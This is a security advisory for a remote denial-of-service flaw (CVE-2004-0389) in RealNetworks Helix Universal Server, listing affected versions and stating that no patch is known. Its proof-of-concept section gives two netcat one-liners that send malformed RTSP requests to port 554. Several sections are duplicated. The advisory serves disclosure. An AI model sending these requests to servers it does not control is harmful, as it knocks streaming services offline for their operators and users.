Real Networks Helix Universal Server Denial of Service Vulnerability
BID:10157
Info
Real Networks Helix Universal Server Denial of Service Vulnerability
| Bugtraq ID: | 10157 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2004-0389 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2004 12:00AM |
| Updated: | Jul 12 2009 04:06AM |
| Credit: | The individual responsible for the discovery of this issue is currently unknown. |
| Vulnerable: |
RealNetworks Helix Universal Server 9.0.4 .958 RealNetworks Helix Universal Server 9.0.2 .881 RealNetworks Helix Universal Server 9.0.2 .802 RealNetworks Helix Universal Server 9.0.2 .794 RealNetworks Helix Universal Server 9.0 1 RealNetworks Helix Universal Mobile Server 10.3.1 .716 RealNetworks Helix Universal Mobile Server 10.1.1 .120 RealNetworks Helix Universal Mobile Gateway 10.3.1 .716 RealNetworks Helix Universal Mobile Gateway 10.1.1 .120 |
| Not Vulnerable: | |
Discussion
Real Networks Helix Universal Server Denial of Service Vulnerability
It has been reported that Real Networks Helix Universal Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to properly handle malformed RTSP (Real-Time Streaming Protocol) requests.
An attacker may leverage this issue to trigger a denial of service condition in the affected server.
It has been reported that Real Networks Helix Universal Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to properly handle malformed RTSP (Real-Time Streaming Protocol) requests.
An attacker may leverage this issue to trigger a denial of service condition in the affected server.
Exploit / POC
Real Networks Helix Universal Server Denial of Service Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
$ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
$ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554
No exploit is required to leverage this issue. The following proof of concept has been provided:
$ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
$ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554
Solution / Fix
Real Networks Helix Universal Server Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Real Networks Helix Universal Server Denial of Service Vulnerability
References:
References:
- Home Page (Real Networks)
- Potential Server Exploit Vulnerability (Real Networks)
- RealNetworks Helix Universal Server Denial of Service Vulnerability (iDefense)